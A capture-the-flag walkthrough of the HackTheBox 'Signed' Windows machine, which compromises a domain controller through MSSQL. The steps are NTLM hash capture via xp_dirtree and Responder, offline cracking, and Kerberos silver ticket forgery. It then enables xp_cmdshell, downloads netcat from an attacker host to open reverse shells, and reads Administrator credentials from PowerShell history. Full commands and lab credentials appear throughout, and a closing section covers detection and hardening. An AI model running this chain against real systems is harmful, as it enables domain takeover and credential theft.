Signed HackTheBox Machine

Machine IP: 10.10.11.90
Difficulty: Medium
Target OS: Windows

Reconnaissance Phase

Initial Port Scanning — Deep Dive

The reconnaissance phase is the foundation of any penetration test. We used Nmap with aggressive scanning options to perform comprehensive service enumeration:

nmap -p 1-65535 -T4 -A -v 10.10.11.90

Command Breakdown:

• -p 1-65535: Scans all 65,535 TCP ports
• -T4: Sets timing template to "aggressive" (fast scan)
• -A: Enables OS detection, version detection, script scanning, and traceroute
• -v: Verbose output for real-time results

What We Discovered:

• Only one open port — 1433/TCP running Microsoft SQL Server 2022 RTM (16.00.1000.00)
• NTLM leakage in SSL handshake revealed the hostname: DC01.SIGNED.HTB (domain controller)
• The service is secured with a self-signed certificate (SSL_Self_Signed_Fallback)

Attack Surface Summary

• Single Point of Entry via MSSQL
• Domain Controller Context: SQL Server on a DC
• Test/Prod Crossover: Self-signed SSL in a domain context

Initial Assessment — Understanding the Attack Surface

When only MSSQL is exposed, it becomes the primary vector. Critical SQL Server features exploitable in this context include:

• xp_cmdshell: Execute OS commands
• xp_dirtree: List directory/UNC contents and triggers NTLM auth
• xp_fileexist, xp_subdirs: File/directory discovery

NTLM authentication is triggered during remote UNC access (e.g., \\attacker-ip\share) allowing credential interception.

Initial Access — Credential Enumeration

Low-Privilege MSSQL Access

We were provided with limited credentials:

Username: scott
Password: Sm230#C5NatH

Connecting using Impacket:

impacket-mssqlclient signed.htb/scott:'Sm230#C5NatH'@10.10.11.90

Connection Details

• TLS-encrypted (port 1433)
• SQL Authentication as scott (guest-level permission)
• Ability to query, but not change configuration

Permission Enumeration

We attempted to enable xp_cmdshell:

enable_xp_cmdshell

• Access Denied — not enough privileges.

Checking database users and roles:

• dbo maps to sa (db_owner)
• guest is unmapped
• scott linked to guest (minimal permissions)
• Can query system views, but can't execute admin commands.

Testing Extended Procedures

We checked xp_dirtree:

SELECT OBJECT_ID('master..xp_dirtree') AS objid;
SELECT HAS_PERMS_BY_NAME('master..xp_dirtree','OBJECT','EXECUTE');

• Result: Returns 1 (has EXECUTE permission)

xp_dirtree is often overlooked; it interacts with SMB when passed a UNC path, prompting NTLM authentication.

NTLM Hash Capture via SMB Relay

Understanding xp_dirtree

Syntax:

xp_dirtree 'path', [depth], [show_files]

Example UNC trigger:

xp_dirtree '\\10.10.14.169\smbshare'

This causes MSSQL to authenticate to our SMB listener using NTLM.

Setting Up Responder

sudo responder -I tun0 -v

• -I tun0: Interface (VPN connection)
• Responder logs NTLM hashes for cracking.

Triggering the Attack

From SQL (low-priv account):

xp_dirtree '\\10.10.14.169\smbshare'

• SQL Server (as SIGNED\mssqlsvc) authenticates, hash is captured by Responder.

Cracking the Hash

Save and crack with John:

john --wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc.hash

Password Recovered: purPLE9795!@

Why effective? Many service accounts have weak/set-and-forget passwords; offline NTLMv2 hashes are vulnerable if passwords are weak.

Privilege Escalation — Service Account Access

Authenticated Connection (Windows Auth)

Reconnect with service creds:

impacket-mssqlclient 'signed.htb/mssqlsvc:purPLE9795!@'@10.10.11.90 -windows-auth

Now using NTLM/Windows authentication as SIGNED\mssqlsvc (likely elevated perms).

Enumerate sysadmin role members:

SELECT r.name AS role, m.name AS member \
FROM sys.server_principals r \
JOIN sys.server_role_members rm ON r.principal_id = rm.role_principal_id \
JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id \
WHERE r.name = 'sysadmin';

• IT group (SIGNED\IT): Has sysadmin role. If we can impersonate this, we get full control.

Kerberos Silver Ticket Forgery

Concept

Silver Tickets allow forging of TGS tickets for specific services by knowing the service account’s NTLM hash and group SIDs — bypassing the KDC.

Requirements

• NTLM hash of service account
• Domain SID
• SPN (Service Principal Name)
• Target privileged group RID

SID Enumeration via SQL

SELECT DEFAULT_DOMAIN() AS mydomain;
SELECT master.sys.fn_varbintohexstr(SUSER_SID('SIGNED\IT'));
SELECT master.sys.fn_varbintohexstr(SUSER_SID('SIGNED\mssqlsvc'));

Parse hex SIDs in Python to obtain S-1-5-21-xxx format.

Example SIDs

• Domain SID: S-1-5-21-4088429403-1159899800-2753317549
• IT Group: S-1-5-21-4088429403-1159899800-2753317549-1105
• mssqlsvc: S-1-5-21-4088429403-1159899800-2753317549-1103

Compute NTLM Hash

iconv -f ASCII -t UTF-16LE <(printf 'purPLE9795!@') | openssl dgst -md4

Result: ef699384c3285c54128a3ee1ddb1a0cc

Forging and Using a Silver Ticket

Forge:

impacket-ticketer -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' \  
  -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \  
  -domain signed.htb \  
  -spn MSSQLSvc/DC01.signed.htb:1433 \  
  -groups 1105 \  
  -user-id 500 \  
  Administrator

Set and connect:

export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k -no-pass DC01.SIGNED.HTB

Troubleshooting Kerberos Authentication

Common Error: Untrusted Domain

If you see this error:

[-] ERROR(DC01): Line 1: Login failed. The login is from an untrusted domain 
and cannot be used with Integrated authentication.

This error has two primary causes:

1. Clock Skew Issues — Understanding Kerberos Time Sensitivity

Why Kerberos Cares About Time:
Kerberos uses timestamps extensively to prevent replay attacks. Every ticket includes:

• authtime: When the client was initially authenticated
• starttime: When the ticket becomes valid
• endtime: When the ticket expires
• renew-till: Maximum lifetime for ticket renewal

The Clock Skew Tolerance:

• Default: 5 minutes (300 seconds)
• Configured in krb5.conf with clockskew parameter
• Both client and server must have synchronized clocks

What Happens with Clock Skew:

• Your machine thinks it's 22:00:00
• The DC thinks it's 22:10:00
• You present a ticket timestamped 22:00:00
• DC sees the ticket is "10 minutes old" (outside the 5-minute window)
• DC rejects the ticket as potentially replayed

Solutions:

• Disable NTP and sync manually:

  sudo timedatectl set-ntp 0
  timedatectl status
  

• Sync with the Domain Controller if possible:

  sudo ntpdate -u 10.10.11.90
  

• Set manual time:

  sudo date -s "2025-10-14 22:00:00"
  date
  

• Use faketime:

  sudo apt install faketime
  faketime '2025-10-14 22:00:00' impacket-mssqlclient -k -no-pass DC01.SIGNED.HTB
  

  How faketime works: Intercepts system calls that read the current time and returns a fake time to the application.

2. VPN Server Issues — Network-Level Problems

Sometimes the issue isn't time — it's the network path to the target.

Common VPN Problems:

• Packet loss (Kerberos uses UDP, port 88)
• MTU issues
• Routing problems
• Firewall rules

Solution:

• Log into HackTheBox or HackTheBox Academy and switch to a closer VPN server, download the new .ovpn file, disconnect/reconnect VPN.

• Verify connectivity:

  ping -c 4 10.10.11.90
  nmap -p 88,445,1433 10.10.11.90
  nc -zv 10.10.11.90 88
  nslookup DC01.SIGNED.HTB
  dig DC01.SIGNED.HTB
  echo "10.10.11.90 DC01.SIGNED.HTB signed.htb DC01" | sudo tee -a /etc/hosts
  

3. Hostname Resolution Issues

Kerberos is extremely sensitive to hostnames. You must use the exact hostname that matches the SPN.

• Wrong:

  impacket-mssqlclient -k -no-pass 10.10.11.90
  

• Correct:

  impacket-mssqlclient -k -no-pass DC01.SIGNED.HTB
  

  The SPN is MSSQLSvc/DC01.SIGNED.HTB:1433, so the hostname must match.

Command Execution and Initial Shell

With sysadmin rights, enable xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Explanation:

• Show Advanced Options: EXEC sp_configure 'show advanced options', 1;
• Reconfigure: RECONFIGURE;
• Enable xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 1;
• Reconfigure again: RECONFIGURE;

Delivering a Reverse Shell

1. Host Netcat:

   python3 -m http.server 8000
   

2. Download via SQL:

   xp_cmdshell "powershell wget -UseBasicParsing http://10.10.16.31:8000/nc.exe -OutFile %temp%/nc.exe"
   

3. Listener:

   nc -lvnp 4444
   

4. Trigger Shell:

   xp_cmdshell "%temp%\\nc.exe -e cmd.exe 10.10.16.31 4444"
   

5. Shell as mssqlsvc:

   C:\Windows\system32>whoami
   signed\mssqlsvc
   

6. Get User Flag:

   type C:\Users\mssqlsvc\Desktop\user.txt
   Flag: 6f1469adadffab<REDACTED>
   

Privilege Escalation to Administrator

Enhanced Silver Ticket (Domain Admin)

Forge a ticket:

impacket-ticketer -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' \  
  -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \  
  -domain signed.htb \  
  -spn MSSQLSvc/DC01.signed.htb:1433 \  
  -groups 1105,512,519 \  
  -user-id 1103 \  
  mssqlsvc

Set the ticket:

export KRB5CCNAME=mssqlsvc.ccache
impacket-mssqlclient -k -no-pass DC01.signed.htb

Read PowerShell History

Enable:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;

PowerShell maintains a command history file for each user, read the file:

SELECT * FROM OPENROWSET(
  BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt',
  SINGLE_CLOB
) AS x;

Credentials found:

Administrator:Th1s889Rabb!t

Final Privilege Escalation — Administrator Shell

1. Upload RunasCs:

   powershell -NoP -NonI -C "Invoke-WebRequest -Uri 'http://10.10.16.31:8000/RunasCs.exe' -OutFile 'C:\Users\mssqlsvc\Desktop\RunasCs.exe' -UseBasicParsing"
   

2. Listener:

   nc -lvnp 443
   

3. Exploit RunasCs:

   .\RunasCs.exe Administrator Th1s889Rabb!t cmd.exe -r 10.10.16.31:443
   

4. Administrator Shell:

   C:\Windows\system32>whoami
   signed\administrator
   

5. Get Root Flag:

   type C:\Users\Administrator\Desktop\root.txt
   Flag: 187e5852ac60ef<REDACTED>
   

Complete Compromise: Achievement Unlocked

• Started as low-priv SQL user
• Captured service creds via NTLM relay
• Forged Kerberos tickets for privilege escalation
• Used xp_cmdshell for OS command execution
• Obtained shells as mssqlsvc and administrator
• Full compromise of the domain controller

Key Takeaways — Technical Insights

1. NTLM Relay via SQL Server

• MSSQL extended procs (xp_dirtree) can expose NTLM hashes to attackers
• Offline cracking is feasible given weak/service credentials

Detection:

• Monitor for MSSQL outbound SMB connections
• Audit xp_dirtree usage and execution

Mitigation:

• Disable unused procedures
• Least-privilege access
• Strong, rotated service passwords

2. Silver Ticket Attacks and Kerberos Trust

• Forging tickets bypasses the KDC — services trust any proper ticket
• High-value if service has local validation only

Mitigation:

• Strong service account passwords
• Enable PAC validation when possible
• Least privilege on group memberships

3. Kerberos Time Sensitivity

• Attacks fail if time is not in sync (default skew 5 min)

Detection:

• Monitor for system time changes or sync errors
• SIEM alert on out-of-range systems

4. SQL Server Hardening Best Practices

• Restrict firewall and port access
• Disable xp_cmdshell and unused procs
• Use managed service accounts (gMSA)
• Enable auditing for sensitive operations
• Restrict file/read permissions

5. Attack Detection and Response

• Monitor outbound SMB, attempted ticket usage, xp_cmdshell abuse
• Incident response: Isolate, investigate, eradicate, and restore

Conclusion

The Signed machine emulates a real-world multi-step compromise path:

• Initial access via weak SQL credentials
• NTLM relay for credential theft
• Privilege escalation through silver ticket forgery
• Lateral movement by reading sensitive user files
• Full admin compromise by executing commands as Administrator

Defense in depth is essential: Any single control may fail, but layers make attacks vastly harder. Lessons learned:

• Segmentation, auditing, password hygiene, and privilege minimization are critical controls at every layer.